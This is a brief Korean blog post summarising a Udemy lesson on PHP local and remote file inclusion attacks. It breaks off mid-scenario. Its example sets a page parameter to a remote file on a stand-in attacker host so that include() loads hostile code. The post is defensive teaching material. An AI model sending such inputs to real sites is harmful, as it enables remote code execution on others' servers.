[화이트헤커가 되기 위한 8가지 웹 해킹 기술]파일 인쿨루젼 공격(Local File Inclusion Attack)

본 포스트는 https://www.udemy.com/의 강좌 화이트헤커가 되기 위한 8가지 웹 해킹 기술 강좌를 바탕으로 작성했습니다. PHP 애플리케이션에서 발생하는 공격이다.

PHP include()를 통해서 지정한 파일을 직접 소스코드에 삽입할 수 있기 때문이다. 파일 인클루젼은 2가지로 나뉜다. [1]로컬파일인쿨르전(LFI) - 웹서버 시스템이 이미 존재하는 파일을 인클루드 하는 것이다. [2]리모트파일인클루젼(RFI) - 더 강력한 공격으로 원격으로 외부의 파일을 인클루드 할 수 있다.

[공격 시나리오] 정상적인 상황에서 page=file.php include(file.php) file.php를 인클루드 하고 있다. 이때 해커는 page=http://hacker.com/bad.php 로 인클루드.....